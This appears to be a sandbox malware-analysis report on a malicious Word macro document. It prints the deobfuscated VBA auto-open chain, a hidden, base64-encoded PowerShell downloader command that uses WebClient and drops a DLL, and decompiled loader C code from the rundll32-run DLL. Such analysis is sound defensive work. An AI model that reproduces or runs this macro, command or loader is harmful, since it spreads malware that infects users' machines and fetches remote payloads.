2)(BWJ)(3s2)(AGJ)(3s2)(kAJ)(3s2)(JwJ)(3s2)(AsJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(cwJ)(3s2)(B5J)(3s2)(AHJ)(3s2)(MAJ)(3s2)(dAJ)(3s2)(BlJ)(3s2)(AEJ)(3s2)(0AJ)(3s2)(LgJ)(3s2)(BuJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(LAJ)(3s2)(AnJ)(3s2)(AEJ)(3s2)(EAJ)(3s2)(TgJ)(3s2)(BhJ)(3s2)(AEJ)(3s2)(cAJ)(3s2)(ZQJ)(3s2)(BSJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(KQJ)(3s2)(AgJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(OwJ)(3s2)(AgJ)(3s2)(ACJ)(3s2)(AAJ)(3s2)(JAJ)(3s2)(BXJ)(3s2)(AHJ)(3s2)(UAJ)(3s2)(bAJ)(3s2)(B3J)(3s2)(AHJ)(3s2)(kAJ)(3s2)(dwJ)(3s2)(BkJ)(3s2)(ADJ)(3s2)(0AJ)(3s2)(KAJ)(3s2)(AoJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(VQJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(sAJ)(3s2)(JwJ)(3s2)(BmJ)(3s2)(AGJ)(3s2)(EAJ)(3s2)(JwJ)(3s2)(ApJ)(3s2)(ACJ)(3s2)(sAJ)(3s2)(KAJ)(3s2)(AnJ)(3s2)(AGJ)(3s2)(8AJ)(3s2)(cAJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(sAJ)(3s2)(JwJ)(3s2)(B2J)(3s2)(ACJ)(3s2)(cAJ)(3s2)(KQJ)(3s2)(ArJ)(3s2)(ACJ)(3s2)(cAJ)(3s2)(bQJ)(3s2)(AnJ)(3s2)(ACJ)(3s2)(kAJ)(3s2)(OwJ)(3s2)(AkJ)(3s2)(AEJ)(3s2)(MAJ)(3s2)(NgJ)(3s2)(A3J)(3s2)(AHJ)(3s2)(kAJ)(3s2)(dgJ)(3s2)(BwJ)(3s2)(AFJ)(3s2)(8AJ)(3s2)(PQJ)(3s2)(AkJ)(3s2)(AEJ)(3s2)(cAJ)(3s2)(ZwJ)(3s2)(BsJ)(3s2)(AGJ)(3s2)(gAJ)(3s2)(MgJ)(3s2)(BsJ)(3s2)(AGJ)(3s2)(kAJ)(3s2)(IAJ)(3s2)(ArJ)(3s2)(ACJ)(3s2)(AA,"J)(3s2)(",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAkAEYAMgBPAE0AWQBqACAAIAA9ACAAWwB0AFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIAIAAtAEYAIAAnAFkAUwB0AGUAJwAsACcARABJAHIAZQBjAFQAbwByAFkAJwAsACcAcwAnACwAJwBNAC4ASQBPAC4AJwApADsAIAAgACAAJAAwAFMASAAxAGcAMwAgACAAPQAgAFsAVABZAHAARQBdACgAIgB7ADMAfQB7ADAAfQB7ADIAfQB7ADEAfQB7ADQAfQAiAC0ARgAnAEUAVAAuACcALAAnAGMARQBwAE8ASQBuAFQAbQAnACwAJwBzAGUAcgBWAGkAJwAsACcAcwB5AHMAdABlAE0ALgBuACcALAAnAEEATgBhAEcAZQBSACcAKQAgACAAOwAgACAAJABXAHUAbAB3AHkAdwBkAD0AKAAoACcAVQAnACsAJwBmAGEAJwApACsAKAAnAG8AcAAnACsAJwB2ACcAKQArACcAbQAnACkAOwAkAEMANgA3AHkAdgBwAF8APQAkAEcAZwBsAGgAMgBsAGkAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEUAMgBjAGkAeABoAGwAOwAkAFMAOAA1AGEAZABvAGQAPQAoACgAJwBJACcAKwAnAGYAbQAnACkAKwAnADAAJwArACgAJwBuACcAKwAnAHEANAAnACkAKQA7ACAAKABsAHMAIAAoACcAdgBBAHIAaQBhACcAKwAnAGIATABlADoAZgAnACsAJwAyAG8AJwArACcATQB5AEoAJwApACAAKQAuAFYAQQBsAHUAZQA6ADoAIgBjAFIAYABFAGAAQQBgAFQAZQBkAEkAcgBlAGMAVABvAHIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcANABxADcAQgBxACcAKwAnAHAAZQAnACkAKwAoACcAZQBuACcAKwAnADYAJwApACsAKAAnADQAcQA3AEIAJwArACcAYgAnACsAJwBzACcAKQArACgAJwA1AHcAXwAnACsAJwBlACcAKQArACgAJwA0AHEAJwArACcANwAnACkAKQAtAFIARQBwAEwAYQBDAEUAKAAnADQAcQAnACsAJwA3ACcAKQAsAFsAYwBoAGEAUgBdADkAMgApACkAOwAkAFMAbAB1AHEAegA4AGkAPQAoACgAJwBJACcAKwAnAGsAcQA4AHUAJwApACsAJwA3AHgAJwApADsAIAAgACgARwBlAHQALQB2AEEAcgBJAEEAQgBsAEUAIAAoACIAMAAiACsAIgBTAEgAMQAiACsAIgBnADMAIgApACAALQBWAEEATAB1AGUAbwBuAGwAIAAgACkAOgA6ACIAcwBFAGAAYwBgAFUAcgBpAFQAeQBwAHIAbwBUAE8AYwBgAG8ATAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVwA3AHkAcwAzAGwAZAA9ACgAKAAnAEIANwAnACsAJwA3AHYAJwApACsAKAAnADAAawAnACsAJwB5ACcAKQApADsAJABLAGEAMABlAGsAZgBhACAAPQAgACgAKAAnAFkAdgB0AGwAJwArACcAeAAnACkAKwAnADYAcAAnACsAJwA0ACcAKQA7ACQASAB6ADUAOQBnADcAcgA9ACgAKAAnAFUAZQAnACsAJwByACcAKQArACgAJwA0ACcAKwAnAGwAMQAnACkAKwAnAHAAJwApADsAJABTAG4ANABiAHgAdQBiAD0AKAAnAFQAMAAnACsAJwBfACcAKwAoACcAbgBsACcAKwAnADkAXwAnACkAKQA7ACQAUABpADkAbgB5AGYAcQA9ACQASABPAE0ARQArACgAKAAoACcAQgBEACcAKwAnAHkAJwApACsAKAAnAEIAcQAnACsAJwBwAGUAZQBuACcAKQArACcANgAnACsAKAAnAEIARAB5ACcAKwAnAEIAYgAnACkAKwAnAHMANQAnACsAKAAnAHcAJwArACcAXwBlAEIARAB5ACcAKQApAC4AIgByAGUAYABQAEwAYQBDAGUAIgAoACgAJwBCACcAKwAnAEQAeQAnACkALAAnAFwAJwApACkAKwAkAEsAYQAwAGUAawBmAGEAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFcANAByAHcAagA5ADgAPQAoACgAJwBLACcAKwAnAGIAaABnACcAKQArACcAZwAnACsAJwA5AHgAJwApADsAJABOAG0AOQBkAGMAdABuAD0ATgBFAFcALQBgAG8AYgBgAGoAZQBgAGMAVAAgAE4ARQBUAC4AVwBFAEIAYwBsAGkARQBOAHQAOwAkAEMAawA4ADEAeAB4ADIAPQAoACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgBKACcAKQArACgAKAAnACkAJwArACcAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAoAGIAaQBnACcAKQApACsAKAAnAGwAYQAnACsAJwB1AGcAJwApACsAJwBoACcAKwAoACcAcwAnACsAJwAuAG8AcgBnACcAKQArACgAKAAnAEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAHMAJwArACcAbQBhAGwAbAAnACkAKwAnAHAAJwArACgAJwBvAHQAYQAnACsAJwB0AG8AZQAnACkAKwAoACgAJwBzAEoAKQAnACsAJwAoADMAJwApACkAKwAoACgAJwBzADIAJwArACcAKQAnACkAKQArACgAKAAnACgAcgAnACkAKQArACgAKAAnAFIAJwArACcAdwBSAHoAJwArACcAYwBKACkAKAAzAHMAMgApACgAQAAnACsAJwBoAHQAJwArACcAdAAnACkAKQArACgAKAAnAHAAOgBKACcAKwAnACkAKAAnACkAKQArACcAMwBzACcAKwAnADIAJwArACgAKAAnACkAKABKACkAJwArACcAKAAnACkAKQArACgAJwAzAHMAJwArACcAMgAnACkAKwAoACgAJwApACgAagBvACcAKwAnAHMAZQBnACcAKwAnAGUAJwArACcAbgBlAC4AYwAnACkAKQArACgAJwBvACcAKwAnAG0ASgAnACkAKwAoACgAJwApACgAMwBzACcAKwAnADIAKQAoAHQAJwArACcAaAAnACkAKQArACcAZQBtACcAKwAoACgAJwBlAEoAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAoACgAJwAoACcAKwAnAGcAVQA4AEoAJwApACkAKwAoACgAJwApACgAJwArACcAMwBzADIAJwApACkAKwAoACgAJwApACgAJwArACcAQABoAHQAdAAnACkAKQArACgAKAAnAHAAJwArACcAOgBKACkAJwApACkAKwAnACgAJwArACgAKAAnADMAcwAnACsAJwAyACkAKABKACcAKwAnACkAKAAzAHMAJwApACkAKwAoACgAJwAyACkAKABwAGEAJwArACcAdQBsACcAKwAnAHMAJwApACkAKwAoACcAYwBvACcAKwAnAG0AcAAnACkAKwAoACcAdQB0AGkAJwArACcAbgAnACkAKwAoACcAZwAuAGMAJwArACcAbwAnACkAKwAoACgAJwBtACcAKwAnAEoAKQAoADMAcwAyACkAKAAnACkAKQArACgAJwBDACcAKwAnAHIAYQBpACcAKQArACgAJwBnACcAKwAnAHMATQAnACkAKwAnAGEAZwAnACsAKAAnAGkAYwBTAHEAJwArACcAdQBhAHIAZ
Dxkc08p3mbht
Open
Open
Open

Strings	Decrypted Strings
"IQTLdE.FEpPmy.IHdOCgSB"
"spaJuD.hyjRQhJ.zAAqzHBB"
"mUzmj.DGYhPmFUM.FjtHqCA"
"J"")(3""s2)""("
"TemfXF.bfMha.jnRqFK"
"hzJiH.sMeEIQHFY.gexKUGUI"
"nSjSfx.APeET.VNDhZIFF"

Line	Instruction	Meta Information
2	Function Oyfrd5_ht_rhw(K33st6ruq1aaq)
3	Goto TrEWGLLVF	executed
4	Dim MGNTHC as String
5	Open "IQTLdE.FEpPmy.IHdOCgSB" For Binary As 185	Open
6	Put # 185, , MGNTHC
7	Close # 185
7	TrEWGLLVF:
9	Goto DobhmY
10	Dim DkKDCCGD as String
11	Open "spaJuD.hyjRQhJ.zAAqzHBB" For Binary As 196	Open
12	Put # 196, , DkKDCCGD
13	Close # 196
13	DobhmY:
15	Goto MJenEIFhH
16	Dim mMDIBBGH as String
17	Open "mUzmj.DGYhPmFUM.FjtHqCA" For Binary As 126	Open
18	Put # 126, , mMDIBBGH
19	Close # 126
19	MJenEIFhH:
21	Oyfrd5_ht_rhw = VBA.Replace(K33st6ruq1aaq, "J" + ")(3" + "s2)" + "(", Dxkc08p3mbht)	Replace("wJ)(3s2)(inJ)(3s2)(mJ)(3s2)(gmJ)(3s2)(tJ)(3s2)(J)(3s2)(SJ)(3s2)(:wJ)(3s2)(J)(3s2)(inJ)(3s2)(3J)(3s2)(2J)(3s2)(_J)(3s2)(J)(3s2)(pJ)(3s2)(J)(3s2)(roJ)(3s2)(J)(3s2)(ceJ)(3s2)(sJ)(3s2)(sJ)(3s2)(J)(3s2)(","J)(3s2)(",) -> winmgmtS:win32_process Dxkc08p3mbht executed
23	Goto HGRHh
24	Dim NwkUz as String
25	Open "TemfXF.bfMha.jnRqFK" For Binary As 159	Open
26	Put # 159, , NwkUz
27	Close # 159
27	HGRHh:
29	Goto nYVDF
30	Dim JXfJku as String
31	Open "hzJiH.sMeEIQHFY.gexKUGUI" For Binary As 113	Open
32	Put # 113, , JXfJku
33	Close # 113
33	nYVDF:
35	Goto bqloIAW
36	Dim gsCwnX as String
37	Open "nSjSfx.APeET.VNDhZIFF" For Binary As 131	Open
38	Put # 131, , gsCwnX
39	Close # 131
39	bqloIAW:
41	End Function

Module: R4bm01nsbtdt1

Declaration

Line	Content
1	Attribute VB_Name = "R4bm01nsbtdt1"
2	Attribute VB_Base = "1Normal.ThisDocument"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = True
8	Attribute VB_Customizable = True

Executed Functions

Subroutine Document_open, APIs: 45, Strings: 0, Number of lines: 3, Relevance: 69.003

APIs	Meta Information
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Item
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: ChrW
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: wdKeyS
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: CreateObject
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Mid
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Len
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Create
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Ud9_lppkb568bn7
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Tt2eddizxwvf
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open
Part of subcall function Enpewjzyrpx@Qfepbztq9r8o1l76: Open

Line	Instruction	Meta Information
9	Private Sub Document_open()
10	Enpewjzyrpx	executed
11	End Sub

Module: UserForm1

Declaration

Line	Content
1	Attribute VB_Name = "UserForm1"
2	Attribute VB_Base = "0{E77D524C-45E0-4303-8950-534590AD4DEB}{E77862AF-692B-4B7B-BD16-0410B9AB2400}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Module: UserForm2

Declaration

Line	Content
1	Attribute VB_Name = "UserForm2"
2	Attribute VB_Base = "0{4550ECA8-53EF-42AC-93D5-0CA903578709}{72C9C4EB-10A3-4885-BA80-C0FBFED082ED}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Module: UserForm3

Declaration

Line	Content
1	Attribute VB_Name = "UserForm3"
2	Attribute VB_Base = "0{8D32BC7D-8238-4012-A57F-F52417AD215A}{35592C14-5CE4-40FF-A081-FD92234D203F}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Module: UserForm4

Declaration

Line	Content
1	Attribute VB_Name = "UserForm4"
2	Attribute VB_Base = "0{7EF12E23-BE33-47E8-84D1-A0E2D10D9A4F}{37B9FED0-64EA-4D5B-873E-97F62B7888F8}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Module: UserForm5

Declaration

Line	Content
1	Attribute VB_Name = "UserForm5"
2	Attribute VB_Base = "0{60066BD8-8410-49CE-BA0A-DC27DC5BE897}{C9E7B34F-93A6-467E-B3A3-50233873FCED}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Reset < >

Analysis Process: powershell.exe PID: 2408 Parent PID: 592 powershell.exeCOMMON

Executed Functions

Function 000007FF00252FE9, Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2099427209.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85c64af3fadb248b480d4c5ccc80f44e1ada92b84ea27998732c2836f3d15b99
Instruction ID: 5deaf62cbe2b1a4159504961e6ab63e74b8709ee00d6db43562c038f9659f490
Opcode Fuzzy Hash: 85c64af3fadb248b480d4c5ccc80f44e1ada92b84ea27998732c2836f3d15b99
Instruction Fuzzy Hash: D041591190EBC20FE793977858696A57FB0AF57211B4E00EBD488CB0F3D95C9D59C362

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF00250780, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2099427209.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43f9de51ea9004e8dc97cbc0174158bc0329c86241a78979b9f9ed8f3e798681
Instruction ID: 11004b436002a5ed1b7189bc9bd2d008b6a1f170a90fef25f74e2707225e7021
Opcode Fuzzy Hash: 43f9de51ea9004e8dc97cbc0174158bc0329c86241a78979b9f9ed8f3e798681
Instruction Fuzzy Hash: 85112E6190E7C20FDB43577848A8664BFB19F0B215B0A44EBC089CF0B3D96C985ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 000007FF0025274B, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2099427209.000007FF00250000.00000040.00000001.sdmp, Offset: 000007FF00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff00250000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e373f9e9790433e40cf7c4c20da20e0ca6c03fe4884973edb5af57fc6afa305f
Instruction ID: a81d98af7fd928dfc34f2eb4580197d6be85fa0a38452f303703f4778c601039
Opcode Fuzzy Hash: e373f9e9790433e40cf7c4c20da20e0ca6c03fe4884973edb5af57fc6afa305f
Instruction Fuzzy Hash: 4FD05E2080DBC94FE702A3386D251D5BFA0FF86245F450697E88DDE0B3EA590BA8C352

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2340 Parent PID: 2532 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	16.5%
Dynamic/Decrypted Code Coverage:	12.8%
Signature Coverage:	10.2%
Total number of Nodes:	1740
Total number of Limit Nodes:	31

Executed Functions

Function 10002460, Relevance: 1960.2, APIs: 1108, Strings: 10, Instructions: 3693
libraryloadermemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E10002460(void* __ebp) {
				signed int _v4;
				CHAR* _v8;
				struct HWND__* _v12;
				intOrPtr _v24;
				signed int _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				struct HWND__* _v64;
				char _v72;
				CHAR* _v80;
				void* _v84;
				CHAR* _v88;
				struct HWND__* _v92;
				intOrPtr _v96;
				char _v100;
				CHAR* _v108;
				struct HWND__* _v112;
				CHAR* _v116;
				void* _v120;
				char _v128;
				char _v132;
				CHAR* _v136;
				struct HWND__* _v140;
				CHAR* _v144;
				CHAR* _v148;
				struct HWND__* _v152;
				char _v156;
				char _v160;
				CHAR* _v164;
				void* _v168;
				CHAR* _v172;
				struct HWND__* _v176;
				CHAR* _v184;
				CHAR* _v192;
				struct HWND__* _v196;
				CHAR* _v200;
				void* _v204;
				CHAR* _v212;
				struct HWND__* _v216;
				CHAR* _v220;
				void* _v224;
				CHAR* _v228;
				void* _v232;
				char _v236;
				CHAR* _v240;
				struct HWND__* _v244;
				CHAR* _v248;
				void* _v252;
				CHAR* _v256;
				void* _v260;
				char _v264;
				char _v268;
				char _v276;
				intOrPtr _v280;
				CHAR* _v288;
				struct HWND__* _v292;
				char _v308;
				intOrPtr _v312;
				char _v316;
				intOrPtr _v320;
				char _v324;
				char _v328;
				struct HWND__* _v332;
				struct HINSTANCE__* _v336;
				struct HWND__* _v340;
				void* _v344;
				char _v348;
				char _v352;
				long _v356;
				void* _v357;
				void* _v365;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t164;
				char* _t1284;
				CHAR* _t1285;
				CHAR* _t1288;
				_Unknown_base(*)()* _t1289;
				signed int _t1294;
				void* _t1296;
				void* _t1302;
				intOrPtr* _t1303;
				int _t1305;
				void* _t1363;
				void* _t1365;
				signed int _t1372;
				void* _t1374;
				void* _t1377;
				signed int _t1378;

				_t1372 =  &_v344;
				_t164 =  *0x1001b6b4; // 0xdfb20980
				_v4 = _t164 ^ _t1372;
				_v332 = 0;
				_v340 = 0;
				_v324 = 0x17;
				_v320 = 0x1e55;
				_v316 = 0x409;
				_v8 = 0xf;
				_v12 = 0;
				_v28 = 0;
				E10001720(0,  &_v32, "Ldr", 3);
				_v212 = 0xf;
				_v216 = 0;
				_v232 = 0;
				E10001720(0,  &_v236, "Acces", 5);
				_v136 = 0xf;
				_v140 = 0;
				_v156 = 0;
				E10001720(0,  &_v160, "sResource", 9);
				_push( &_v168);
				_push( &_v252);
				_push( &_v56);
				_push(E10001B80( &_v56, _t1363, 0xf,  &_v336));
				E10001B80( &_v56, _t1363, 0xf,  &_v84);
				_t1374 = _t1372 + 0x18;
				_t1381 = _v312 - 0x10;
				if(_v312 >= 0x10) {
					E10006B91(0, 0x10, _t1365, _t1381, _v308);
					_t1374 = _t1374 + 4;
				}
				_v336 = LoadLibraryA("ntdll.dll");
				_v148 = 0xf;
				_v152 = 0;
				_v168 = 0;
				E10001720(0,  &_v172, "LdrF", 4);
				_v240 = 0xf;
				_v244 = 0;
				_v260 = 0;
				E10001720(0,  &_v264, "ind", 3);
				_v108 = 0xf;
				_v112 = 0;
				_v128 = 0;
				E10001720(0,  &_v132, "Resour", 6);
				_v200 = 0xf;
				_v204 = 0;
				_v220 = 0;
				E10001720(0,  &_v224, "ce_U", 4);
				_push( &_v232);
				_push( &_v148);
				_push( &_v288);
				_push( &_v204);
				_push(E10001B80( &_v288, 0x10, 0xf,  &_v316));
				_push(E10001B80( &_v344, 0x10, 0xf,  &_v344));
				E10001B80( &_v344, 0x10, 0xf,  &_v120);
				_t1377 = _t1374 + 0x24;
				_t1382 = _v320 - 0x10;
				if(_v320 >= 0x10) {
					E10006B91(0, 0x10, _t1365, _t1382, _v308);
					_t1377 = _t1377 + 4;
				}
				_v288 = 0xf;
				_v292 = 0;
				_v308 = 0;
				_t1383 = _v260 - 0x10;
				if(_v260 >= 0x10) {
					E10006B91(0, 0x10, _t1365, _t1383, _v280);
					_t1377 = _t1377 + 4;
				}
				ShowWindow(0, 0); // executed
				ShowWindow(0, 0); // executed
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
				ShowWindow(0, 0);
